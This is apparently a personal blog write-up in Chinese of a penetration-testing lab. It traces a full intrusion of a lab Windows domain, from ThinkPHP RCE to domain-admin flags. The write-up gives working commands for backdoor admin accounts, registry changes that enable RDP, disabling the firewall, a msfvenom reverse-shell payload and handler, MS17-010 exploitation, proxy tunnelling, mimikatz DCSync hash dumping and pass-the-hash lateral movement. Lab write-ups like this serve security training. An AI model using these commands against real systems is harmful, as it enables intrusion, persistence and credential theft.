渗透

cyber-lab1

lab1

精简思路

1

10主机拿shell,添加用户rpd登入后扫横向发现20,30主机,30有永恒之蓝,上线msf,拿完flag后添加一个用户,然后搭建代理远程登入,发现是域控机子,直接抓哈希然后横向20主机拿flag

1.ThinkPHP rce

fscan扫一下,发现Thinkphp漏洞,那就用thinkphp的漏扫工具进行利用

image-20251130132255156

发现扫出来漏洞

image-20251130133912002

然后getshell

image-20251130134131165

flag在根

image-20251130135806041

发现另一个网段

image-20251130140242641

蚁剑扫这个网段不行?我们先远程连接

2.远程连接

添加一个后门用户,远程连接

1
2
3
4

# 创建用户
net user xpw 123Qwe@ /add
# 添加到管理员组
net localgroup administrators xpw /add

查询是否开启远程桌面

1
2

● 返回1表示禁用
● 返回0表示开启

1

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

发现没开启,开启远程桌面

1

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

image-20251130150933450

kali连接

1

xfreerdp /u:xpw /p:'123Qwe@' /v:192.168.10.10 /sec:rdp /cert:ignore /drive:share,/mnt/xpw/kali_shard

没连上

修改注册表启用远程桌面连接-注册表禁用身份认证 

1

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

1
2
3
4
5
6

REG ADD: 用于向注册表中添加或修改键值。
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server: 注册表路径,控制远程桌面连接的设置。
/v fDenyTSConnections: 指定要修改的键值名称。
/t REG_DWORD: 指定键值类型为 DWORD。
/d 00000000: 设置键值的数值数据为 0(表示启用远程桌面连接)。
/f: 强制覆盖现有键值,无需确认。

然后kali连接

1

xfreerdp /u:xpw /p:'123Qwe@' /v:192.168.10.10 /sec:rdp /cert:ignore /drive:share,/mnt/xpw/kali_shard   /timeout:300000

1
2
3

/sec:rdp= 使用传统的RDP加密Windows NT/2000/XP时代
/cert:ignore跳过了证书验证步骤
/mnt/xpw/kali_shard #共享文件夹

在kali将fscan.exe上传到目录文件,这样远程桌面就有fscan.exe了

1

sudo cp fscan.exe /mnt/xpw/kali_shard/

不对?fscan.exe上传到kali,然后再到远程桌面后不能用了???不对,蚁剑直接连了服务,直接蚁剑上传就好了!(后面发现还是win上面连方便一点)

image-20251130154955848

发现另外2台主机,都存在MS17-010永恒之蓝漏洞

1
2
3

192.168.20.10 #当前已经拿到权限的
192.168.20.20
192.168.20.30

msf反弹连接打永恒之蓝-添加用户

fscan扫描一下20和30两台主机,都存在MS17-010永恒之蓝漏洞

image-20260111155836732

image-20260111160122471

由于都是内网,那么接下来先通过kali连接openvpn

1
2
3
4

sudo openvpn --config cyberstrikelab.com-lab1.ovpn --keepalive 10 60 &

#kali连了vpn访问不了外网,所以用完要关sudo killall openvpn
#--keepalive 10 60 & 是保持VPN连接稳定的关键参数
image-20260111164955489

然后还得加这条命令,不然kali还是与题目不通

1
2

sudo ip route add 192.168.10.0/24 via 172.16.233.1 dev tun0
#意思是当你想要访问192.168.10.0/24这个网段(比如192.168.10.10)的任何机器时,请把数据包发给172.16.233.1这个网关,并通过tun0(VPN接口)发送出去

上线msf

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=9999 -f exe -o 1.exe

然后将这个1.exe上传到靶机,然后运行,接着打

1
2
3
4
5
6

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.233.2
set lport 9999
run

image-20260111201835000

自动获取路由

1
2

run post/multi/manage/autoroute
run autoroute -p ## 查看路由

image-20260111201932522

然后退出当前会话, 搜索永恒之蓝漏洞进行利用,打20主机没用?那打20主机

1
2
3
4
5
6

background
search ms17
use auxiliary/admin/smb/ms17_010_command
set RHOSTS 192.168.20.30
set COMMAND whoami
run

image-20260111203613987

可能会因为网络波动,打不上,多试就行了,这是flag3

image-20260111203909742

为了持久化,开启它的远程连接服务,并加一个用户

1
2
3
4

set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set COMMAND net user xtk 123@abc /add
set COMMAND net localgroup Administrators xtk /add
set COMMAND netsh firewall set opmode disable

每个命令都要run一下,如果有问题执行不了就重开一个终端重新运行一下

Stowaway 进行代理-远程登入

kali上面执行admin端

1

./linux_x64_admin -l 172.16.233.2:8000 -s 123

10主机上执行agent端(注意是用win_86)

1

windows_x86_agent.exe -c 172.16.233.2:8000 -s 123 --reconnect 8

不知道为啥我载蚁剑与远程桌面都打不了,而且一打vpn就断,后面发现了,不能用本地的远程桌面连接打这个,kali一打这个命令,本地的远程桌面就有可能崩,如果没崩,远程桌面一打绝对崩,这点坑死我了,最后用kali远程桌面成功(本地远程桌面好是好,毕竟复制文件方便,但是在这个靶场真难过,奇奇怪怪)

image-20260111225000102

然后就将proxychains4代理改成127.0.0.1 5555就行了,然后就可以rpd登入.30主机

1

proxychains4 rdesktop 192.168.20.30

登录的是域控服务器,用户名前带.\,即.\xtk登入

image-20260111235526639

执行

1

net group "Domain Controllers" /domain

image-20260112102746444

发现是域控服务器,那就可以用域控打20主机

想上线cs,把cs服务端放kali,给所有文件权限

1

chmod -R +x 

1

sudo ./teamserver 172.16.233.2 111111

但是本地登不进去?那就算了。看到30主机就是域控服务器,那么就可以通过横向获取到20主机的权限了,想把mimikatz上传到.20然后再上传到30,发现不用这么麻烦,直接给30开一个共享目录(vpn太不稳定了,这2个主机都卡的要死,后面发现kali连vpn加上参数 --keepalive 10 60 &好多了),命令登入用户由于30主机是域控所以有点不同,要加上域名,这个命令查看

1

net config workstation

image-20260112103524268

1

proxychains4 rdesktop 192.168.20.30 -u "cyberstrikelab.com\\xtk" -p '123@abc' -r disk:kali_share=/mnt/xpw/kali_shard

猕猴桃抓哈希打域控

然后上传猕猴桃抓哈希

image-20260112103823084

1
2

privilege::debug
lsadump::dcsync /domain:cyberstrikelab.com /all

image-20260112104703070

1

94bd5248e87cb7f2f9b871d40c903927

使用这个hash进行横向利用

1

proxychains4 impacket-psexec -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/administrator@192.168.20.20

1

type C:\\flag.txt

image-20260112105109868

这个命令也行

1

proxychains4 crackmapexec smb 192.168.20.20 -u administrator -H 94bd5248e87cb7f2f9b871d40c903927  -d cyberstrikelab.com -x "type C:\\flag.txt"

image-20260112105643247

1

这是这个靶场的第一题,写的巨难受,开始用vpn连总是断,后来才发现不能win连vpn,然后kali又连vpn,这样vpn就会不稳定,然后就是kali打的时候连vpn与rpd远程都要加上一些使之稳定的参数。也是慢慢磨出来了。还有就是本来想上线cs,结果失败,想了想原因,kali显示成功,但是本地显示连不上?那是Windows无法访问172.16.233.2,因为win没连vpn,但是win一连vpn,kali就有崩,最后只能把客户端放在kali打,尝试我只能上线20,不知道30为啥上线不了,奇奇怪怪
Emo
谢谢观看
© 2025 - 2026 luokaihong
使用 Hugo 构建
主题 StackJimmy 设计